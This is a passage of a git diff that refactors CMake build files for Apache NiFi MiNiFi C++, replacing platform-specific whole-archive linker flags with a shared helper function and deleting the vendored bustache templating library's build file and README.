 ENDFOREACH()
diff --git a/libminifi/test/gps-tests/CMakeLists.txt b/libminifi/test/gps-tests/CMakeLists.txt
index fdb9af0..77abc3b 100644
--- a/libminifi/test/gps-tests/CMakeLists.txt
+++ b/libminifi/test/gps-tests/CMakeLists.txt
@@ -24,12 +24,9 @@
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/gps/")
-	createTests("${testfilename}")	
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-gps minifi-standard-processors)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-gps minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-gps)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR GPS_TEST_COUNT "${GPS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/jni-tests/CMakeLists.txt b/libminifi/test/jni-tests/CMakeLists.txt
index 1e465b1..6c0e082 100644
--- a/libminifi/test/jni-tests/CMakeLists.txt
+++ b/libminifi/test/jni-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.1/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-jni)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/kafka-tests/CMakeLists.txt b/libminifi/test/kafka-tests/CMakeLists.txt
index 5172ca2..d337bd3 100644
--- a/libminifi/test/kafka-tests/CMakeLists.txt
+++ b/libminifi/test/kafka-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.4/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-rdkafka-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/mqtt-tests/CMakeLists.txt b/libminifi/test/mqtt-tests/CMakeLists.txt
index 1e465b1..3b0d482 100644
--- a/libminifi/test/mqtt-tests/CMakeLists.txt
+++ b/libminifi/test/mqtt-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.1/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-mqtt-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/pcap-tests/CMakeLists.txt b/libminifi/test/pcap-tests/CMakeLists.txt
index f66333c..8af7084 100644
--- a/libminifi/test/pcap-tests/CMakeLists.txt
+++ b/libminifi/test/pcap-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/pcap/")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_BINARY_DIR}/extensions/pcap/pcap++/Dist/header/")
     createTests("${testfilename}")
-    if(APPLE)    
-        target_link_libraries ("${testfilename}" -Wl,-all_load minifi-pcap minifi-standard-processors)
-	else()
-        target_link_libraries ("${testfilename}" -Wl,--whole-archive minifi-pcap minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
+    target_wholearchive_library(${testfilename} minifi-pcap)
+    target_wholearchive_library(${testfilename} minifi-standard-processors)
   MATH(EXPR PCAP_INT_TEST_COUNT "${PCAP_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
diff --git a/libminifi/test/rocksdb-tests/CMakeLists.txt b/libminifi/test/rocksdb-tests/CMakeLists.txt
index 96c9fd7..67b4a46 100644
--- a/libminifi/test/rocksdb-tests/CMakeLists.txt
+++ b/libminifi/test/rocksdb-tests/CMakeLists.txt
@@ -26,11 +26,8 @@
   	target_include_directories(${testfilename} BEFORE PRIVATE "${ROCKSDB_THIRDPARTY_ROOT}/include")
 	createTests("${testfilename}")	
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-rocksdb-repos)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rocksdb-repos -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-rocksdb-repos)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR ROCKSDB_TEST_COUNT "${ROCKSDB_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/script-tests/CMakeLists.txt b/libminifi/test/script-tests/CMakeLists.txt
index b2311ed..5ac0314 100644
--- a/libminifi/test/script-tests/CMakeLists.txt
+++ b/libminifi/test/script-tests/CMakeLists.txt
@@ -35,11 +35,8 @@
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/script/python")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/pybind11/include")
 	add_definitions(-DPYTHON_SUPPORT)
-	if (APPLE)
-		target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARIES} minifi-script-extensions minifi-standard-processors )
-	else ()
-		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARIES}  minifi-script-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif()
+	target_wholearchive_library(${testfilename} minifi-script-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
@@ -53,11 +50,8 @@
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/script/lua")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/sol2-2.17.5")
 	add_definitions(-DLUA_SUPPORT)
-	if (APPLE)
-		target_link_libraries ("${testfilename}"  -Wl,-all_load ${ZLIB_LIBRARIES} minifi-script-extensions )
-	else ()
-		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARIES}  minifi-script-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif()
+	target_wholearchive_library(${testfilename} minifi-script-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
diff --git a/libminifi/test/sensors-tests/CMakeLists.txt b/libminifi/test/sensors-tests/CMakeLists.txt
index 767fd57..8f99d79 100644
--- a/libminifi/test/sensors-tests/CMakeLists.txt
+++ b/libminifi/test/sensors-tests/CMakeLists.txt
@@ -29,12 +29,10 @@
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/sensors/")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_BINARY_DIR}/extensions/sensors/")
     createTests("${testfilename}")
-    if(APPLE)    
-    	target_link_libraries ("${testfilename}" -Wl,-all_load minifi-sensors )
-	else()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive minifi-sensors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR SENSORS_INT_TEST_COUNT "${SENSORS_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-sensors)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR SENSORS_INT_TEST_COUNT "${SENSORS_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${SENSORS_INT_TEST_COUNT} sensor(s) test file(s)...")
diff --git a/libminifi/test/sqlite-tests/CMakeLists.txt b/libminifi/test/sqlite-tests/CMakeLists.txt
index c039101..939246c 100644
--- a/libminifi/test/sqlite-tests/CMakeLists.txt
+++ b/libminifi/test/sqlite-tests/CMakeLists.txt
@@ -27,11 +27,8 @@
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/sqlite")
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/sqlite")
 
-  if (APPLE)
-    target_link_libraries (${testfilename} -Wl,-all_load minifi-sqlite-extensions minifi-standard-processors)
-  else ()
-    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-sqlite-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  endif ()
+  target_wholearchive_library(${testfilename} minifi-sqlite-extensions)
+  target_wholearchive_library(${testfilename} minifi-standard-processors)
 
   createTests("${testfilename}")
   target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
diff --git a/libminifi/test/tensorflow-tests/CMakeLists.txt b/libminifi/test/tensorflow-tests/CMakeLists.txt
index 906b325..c7e68eb 100644
--- a/libminifi/test/tensorflow-tests/CMakeLists.txt
+++ b/libminifi/test/tensorflow-tests/CMakeLists.txt
@@ -24,16 +24,13 @@
 SET(EXTENSIONS_TEST_COUNT 0)
 FOREACH(testfile ${TENSORFLOW_INTEGRATION_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
-	add_executable("${testfilename}" "${testfile}" ${SPD_SOURCES} "${TEST_DIR}/TestBase.cpp")
+	add_executable("${testfilename}" "${testfile}" "${TEST_DIR}/TestBase.cpp")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/tensorflow")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 	target_include_directories(${testfilename} PRIVATE BEFORE ${TENSORFLOW_INCLUDE_DIRS})
 	createTests("${testfilename}")
-	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-tensorflow-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-tensorflow-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-tensorflow-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/usb-camera-tests/CMakeLists.txt b/libminifi/test/usb-camera-tests/CMakeLists.txt
index c00b300..242131c 100644
--- a/libminifi/test/usb-camera-tests/CMakeLists.txt
+++ b/libminifi/test/usb-camera-tests/CMakeLists.txt
@@ -22,15 +22,12 @@
 SET(EXTENSIONS_TEST_COUNT 0)
 FOREACH(testfile ${USB_CAMERA_INTEGRATION_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
-	add_executable("${testfilename}" "${testfile}" ${SPD_SOURCES} "${TEST_DIR}/TestBase.cpp")
+	add_executable("${testfilename}" "${testfile}" "${TEST_DIR}/TestBase.cpp")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/usb-camera")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/libuvc-0.0.6/include")
 	createTests("${testfilename}")
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-usb-camera-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-usb-camera-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-usb-camera-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/main/CMakeLists.txt b/main/CMakeLists.txt
index 3634bf0..ef0eaf3 100644
--- a/main/CMakeLists.txt
+++ b/main/CMakeLists.txt
@@ -23,8 +23,7 @@
   CMAKE_POLICY(SET CMP0048 OLD)
 ENDIF(POLICY CMP0048)
 
-include_directories(../libminifi/include ../thirdparty/cron ../thirdparty/spdlog-20170710/include ../thirdparty/concurrentqueue ../thirdparty/yaml-cpp-yaml-cpp-20171024/include ../thirdparty/rapidjson-1.1.0/include ../thirdparty/)
-include_directories(${JEMALLOC_INCLUDE_DIRS})
+include_directories(../libminifi/include)
 
 if(WIN32)
 	add_definitions(-DWIN32_LEAN_AND_MEAN)
@@ -69,47 +68,13 @@
   target_link_libraries(minifiexe "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-set (WIN32_ARCHIVES "")
+target_wholearchive_library(minifiexe core-minifi)
+target_wholearchive_library(minifiexe minifi)
 
-# Link against minifi, yaml-cpp, civetweb-cpp, uuid, openssl, and rocksdb
-#target_link_libraries(minifiexe core-minifi)
-
-if (APPLE)
-	target_link_libraries (minifiexe -Wl,-all_load core-minifi)
-elseif(NOT WIN32)
-	target_link_libraries (minifiexe -Wl,--whole-archive core-minifi -Wl,--no-whole-archive)
-else()
-	#target_link_libraries (minifiexe core-minifi)
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi")
-#	set_target_properties(minifiexe PROPERTIES LINK_FLAGS "/WHOLEARCHIVE:core-minifi")
-endif ()
-
-# Include OpenSSL
-if (OPENSSL_FOUND)
-	if (APPLE)
-		target_link_libraries(minifiexe -Wl,-all_load ${OPENSSL_LIBRARIES})
-	elseif(NOT WIN32)
-		target_link_libraries(minifiexe -Wl,--whole-archive ${OPENSSL_LIBRARIES} -Wl,--no-whole-archive)
-	else()
-	target_link_libraries(minifiexe ${OPENSSL_LIBRARIES})
-	endif()
-	include_directories(${OPENSSL_INCLUDE_DIR})
-endif(OPENSSL_FOUND)
-
-add_dependencies(minifiexe minifi)
-
-
-if (APPLE)
-	target_link_libraries (minifiexe -Wl,-all_load minifi)
-elseif(NOT WIN32)
-	target_link_libraries (minifiexe -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-else()
-	target_link_libraries (minifiexe minifi)
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi")
-	#set_target_properties(minifiexe PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi")
-endif ()
-
-target_link_libraries(minifiexe yaml-cpp ${JEMALLOC_LIBRARIES}) #
+target_link_libraries(minifiexe yaml-cpp)
+if(NOT WIN32 AND ENABLE_JNI AND NOT DISABLE_JEMALLOC)
+	target_link_libraries(minifiexe JeMalloc::JeMalloc)
+endif()
 
 if (WIN32)
 	include_directories("../thirdparty/Simple-Windows-Posix-Semaphore")
@@ -123,34 +88,13 @@
 	endif(LIBC_STATIC)
 endif(NOT USE_SHARED_LIBS)
 
-if (APPLE)
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-		message("Linking MiNiFiMain against ${EXTENSION}")
-		target_link_libraries (minifiexe -Wl,-all_load ${EXTENSION})
-		add_dependencies(minifiexe ${EXTENSION})
-	endforeach()    
-else ()
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-	if (WIN32)
-	target_link_libraries (minifiexe ${EXTENSION})
-	  set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:${EXTENSION}")
-	  add_dependencies(minifiexe ${EXTENSION})
-    else()
-	  target_link_libraries (minifiexe -Wl,--whole-archive ${EXTENSION} -Wl,--no-whole-archive)
-	  add_dependencies(minifiexe ${EXTENSION})
-	  endif()
-	endforeach()
-endif ()
+get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
+foreach(EXTENSION ${extensions})
+	message("Linking MiNiFiMain against ${EXTENSION}")
+	target_wholearchive_library(minifiexe ${EXTENSION})
+endforeach()
 
-if(WIN32)
-	set_target_properties(minifiexe PROPERTIES LINK_FLAGS "${LINK_FLAGS} ${WIN32_ARCHIVES}")
-endif()
-set_target_properties(minifiexe
-        PROPERTIES OUTPUT_NAME minifi)
-
-               
+set_target_properties(minifiexe PROPERTIES OUTPUT_NAME minifi)
 
 if (NOT WIN32)
 add_custom_command(TARGET minifiexe POST_BUILD
diff --git a/nanofi/CMakeLists.txt b/nanofi/CMakeLists.txt
index 7110519..a941676 100644
--- a/nanofi/CMakeLists.txt
+++ b/nanofi/CMakeLists.txt
@@ -24,8 +24,7 @@
 ENDIF(POLICY CMP0048)
 
 include_directories(include)
-include_directories(../libminifi/include ../thirdparty/cron ../thirdparty/spdlog-20170710/include)
-include_directories(../thirdparty/ut)
+include_directories(../libminifi/include)
 
 if(WIN32)
 include_directories(../libminifi/opsys/win)
@@ -65,42 +64,23 @@
 
 add_library(nanofi STATIC ${NANOFI_SOURCES})
 
-if (APPLE)
-	target_link_libraries (nanofi -Wl,-all_load core-minifi minifi minifi-standard-processors)
-elseif(NOT WIN32)
-	target_link_libraries (nanofi -Wl,--whole-archive core-minifi minifi minifi-standard-processors -Wl,--no-whole-archive)
-else()
-    set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-endif ()
+target_link_libraries(nanofi spdlog ut)
+target_wholearchive_library(nanofi core-minifi)
+target_wholearchive_library(nanofi minifi)
+target_wholearchive_library(nanofi minifi-standard-processors)
 
-add_dependencies(nanofi minifi-standard-processors)
-
-if(WIN32)
-	set_target_properties(nanofi PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-endif()
 
 if (ENABLE_PYTHON AND NOT STATIC_BUILD)
 
 add_library(nanofi-shared SHARED ${NANOFI_SOURCES})
 
-if (APPLE)
-	target_link_libraries (nanofi-shared -Wl,-all_load core-minifi-shared minifi-shared minifi-standard-processors)
-elseif(NOT WIN32)
-	target_link_libraries (nanofi-shared -Wl,--whole-archive core-minifi-shared minifi-shared  minifi-standard-processors -Wl,--no-whole-archive)
-else()
-    set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:core-minifi-shared")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-shared")
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-endif ()
+target_link_libraries(nanofi-shared spdlog ut)
+target_wholearchive_library(nanofi-shared core-minifi-shared)
+target_wholearchive_library(nanofi-shared minifi-shared)
+target_wholearchive_library(nanofi-shared minifi-standard-processors)
 
 add_dependencies(nanofi-shared minifi-standard-processors)
 
-if(WIN32)
-	set_target_properties(nanofi-shared PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-endif()
-
 set_property(TARGET nanofi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
 
 endif(ENABLE_PYTHON AND NOT STATIC_BUILD)
diff --git a/nanofi/ecu/CMakeLists.txt b/nanofi/ecu/CMakeLists.txt
index fccb443..9c9e314 100644
--- a/nanofi/ecu/CMakeLists.txt
+++ b/nanofi/ecu/CMakeLists.txt
@@ -19,26 +19,17 @@
 
 cmake_minimum_required(VERSION 2.6)
 
-if (APPLE)
-    set(LINK_FLAGS "-Wl,-all_load")
-    set(LINK_END_FLAGS "")
-elseif (UNIX)
-    set(LINK_FLAGS "-Wl,--whole-archive")
-    set(LINK_END_FLAGS "")
-endif ()
 
 if (NOT WIN32)
-
 add_executable(log_aggregator log_aggregator.c)
-
-target_link_libraries(log_aggregator nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_link_libraries(log_aggregator nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(log_aggregator minifi-http-curl)
 
 add_executable(tailfile_chunk tailfile_chunk.c)
-
-target_link_libraries(tailfile_chunk nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_link_libraries(tailfile_chunk nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(tailfile_chunk minifi-http-curl)
 
 add_executable(tailfile_delimited tailfile_delimited.c)
-
-target_link_libraries(tailfile_delimited nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
-
-endif()
\ No newline at end of file
+target_link_libraries(tailfile_delimited nanofi ${CMAKE_THREAD_LIBS_INIT})
+target_wholearchive_library(tailfile_delimited minifi-http-curl)
+endif()
diff --git a/nanofi/examples/CMakeLists.txt b/nanofi/examples/CMakeLists.txt
index 6a9779c..fa1be9f 100644
--- a/nanofi/examples/CMakeLists.txt
+++ b/nanofi/examples/CMakeLists.txt
@@ -46,24 +46,14 @@
 
 endif()
 
-if (WIN32)
-    set(LINK_FLAGS "/WHOLEARCHIVE")
-    set(LINK_END_FLAGS "")
-elseif (APPLE)
-    set(LINK_FLAGS "-Wl,-all_load")
-    set(LINK_END_FLAGS "")
-else ()
-    set(LINK_FLAGS "-Wl,--whole-archive")
-    set(LINK_END_FLAGS "")
-endif ()
-
 if (NOT WIN32)
 
 add_executable(generate_flow generate_flow.c)
 
 add_executable(terminate_handler terminate_handler.c)
 
-target_link_libraries(generate_flow nanofi ${CMAKE_THREAD_LIBS_INIT} ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(generate_flow minifi-http-curl)
+target_link_libraries(generate_flow nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 target_link_libraries(terminate_handler nanofi ${CMAKE_THREAD_LIBS_INIT} )
 
@@ -73,14 +63,17 @@
 
 add_executable(transmit_flow transmit_flow.c)
 
-target_link_libraries(transmit_flow nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(transmit_flow minifi-http-curl)
+target_link_libraries(transmit_flow nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 add_executable(transmit_payload transmit_payload.c)
 
-target_link_libraries(transmit_payload nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(transmit_payload minifi-http-curl)
+target_link_libraries(transmit_payload nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 add_executable(monitor_directory monitor_directory.c)
 
-target_link_libraries(monitor_directory nanofi ${CMAKE_THREAD_LIBS_INIT}  ${LINK_FLAGS} minifi-http-curl ${LINK_END_FLAGS})
+target_wholearchive_library(monitor_directory minifi-http-curl)
+target_link_libraries(monitor_directory nanofi ${CMAKE_THREAD_LIBS_INIT})
 
 endif()
diff --git a/python/library/CMakeLists.txt b/python/library/CMakeLists.txt
index 684cf22..4a94271 100644
--- a/python/library/CMakeLists.txt
+++ b/python/library/CMakeLists.txt
@@ -23,7 +23,7 @@
   CMAKE_POLICY(SET CMP0048 OLD)
 ENDIF(POLICY CMP0048)
 
-include_directories(../../nanofi/include/ ../../libminifi/include  ../../libminifi/include/c2  ../../libminifi/include/c2/protocols/  ../../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../../libminifi/include/core/yaml  ../../libminifi/include/core  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-20171024/include ../../thirdparty/civetweb-1.9.1/include ../../thirdparty/)
+include_directories(../../nanofi/include/ ../../libminifi/include  ../../libminifi/include/c2  ../../libminifi/include/c2/protocols/  ../../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../../libminifi/include/core/yaml  ../../libminifi/include/core ../../thirdparty/)
 if(WIN32)
 	include_directories(../../libminifi/opsys/win)
 else()
@@ -38,13 +38,4 @@
 	target_link_libraries(python-lib nanofi-shared core-minifi-shared minifi-shared)
 endif(APPLE)
 
-if (WIN32)
-target_link_libraries(python-lib ${CURL_LIBRARY}  minifi-http-curl)
-    set_target_properties(python-lib PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE:minifi-http-curl"
-    )
-elseif (APPLE)
-	target_link_libraries(python-lib ${CURL_LIBRARY}  -Wl,-all_load minifi-http-curl)
-else ()
-	target_link_libraries(python-lib -Wl,--whole-archive minifi-http-curl -Wl,--no-whole-archive ${CURL_LIBRARY} )
-endif ()
\ No newline at end of file
+target_wholearchive_library(python-lib minifi-http-curl)
diff --git a/thirdparty/bustache/CMakeLists.txt b/thirdparty/bustache/CMakeLists.txt
deleted file mode 100644
index 0fefa02..0000000
--- a/thirdparty/bustache/CMakeLists.txt
+++ /dev/null
@@ -1,64 +0,0 @@
-cmake_minimum_required(VERSION 3.2 FATAL_ERROR)
-
-#set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} )
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/Modules/")
-
-project(bustache VERSION 1.0.0 LANGUAGES CXX)
-
-option(BUSTACHE_ENABLE_TESTING "Enable testing of the bustache library." OFF)
-
-# Set the default CMAKE_BUILD_TYPE to Release.
-# This should be done before the project command since the latter can set
-# CMAKE_BUILD_TYPE itself (it does so for nmake).
-if (NOT CMAKE_BUILD_TYPE)
-  set(CMAKE_BUILD_TYPE Release CACHE STRING
-    "Choose the type of build, options are: None(CMAKE_CXX_FLAGS or CMAKE_C_FLAGS used) Debug Release RelWithDebInfo MinSizeRel.")
-endif()
-
-add_library(${PROJECT_NAME}
-    src/format.cpp
-    src/generate.cpp
-)
-
-find_package(Boost REQUIRED)
-
-# Define headers for this library. PUBLIC headers are used for
-# compiling the library, and will be added to consumers' build
-# paths.
-target_include_directories(${PROJECT_NAME}
-    PUBLIC
-        include
-        ${Boost_INCLUDE_DIR}
-)
-
-# If we have compiler requirements for this library, list them here
-# target_compile_features(${PROJECT_NAME}
-#     PUBLIC
-#         cxx_alias_templates
-#         cxx_auto_type
-#         cxx_decltype_auto
-#         cxx_user_literals
-#         cxx_rvalue_references
-#         cxx_range_for
-#         cxx_nullptr
-#         cxx_noexcept
-#         cxx_inline_namespaces
-# )
-
-set_target_properties(${PROJECT_NAME} PROPERTIES
-    CXX_STANDARD 11
-)
-
-# 'make install' to the correct location
-install(TARGETS ${PROJECT_NAME}
-    ARCHIVE  DESTINATION lib
-    LIBRARY  DESTINATION lib
-    RUNTIME  DESTINATION bin  # This is for Windows
-)
-
-install(DIRECTORY include/ DESTINATION include)
-
-if (BUSTACHE_ENABLE_TESTING)
-    enable_testing()
-    add_subdirectory(test)
-endif()
diff --git a/thirdparty/bustache/README.md b/thirdparty/bustache/README.md
deleted file mode 100644
index d453a04..0000000
--- a/thirdparty/bustache/README.md
+++ /dev/null
@@ -1,267 +0,0 @@
-{{ bustache }} [![Try it online][badge.wandbox]](https://wandbox.org/permlink/Vxmrb2GgcLKicC7N)
-========
-
-C++11 implementation of [{{ mustache }}](http://mustache.github.io/), compliant with [spec](https://github.com/mustache/spec) v1.1.3.
-
-## Dependencies
-* [Boost](http://www.boost.org/) - for `unordered_map`, etc
-
-### Optional Dependencies
-* [Google.Benchmark](https://github.com/google/benchmark) - for benchmark
-* [Catch](https://github.com/philsquared/Catch) - for test
-
-## Supported Features
-* Variables
-* Sections
-* Inverted Sections
-* Comments
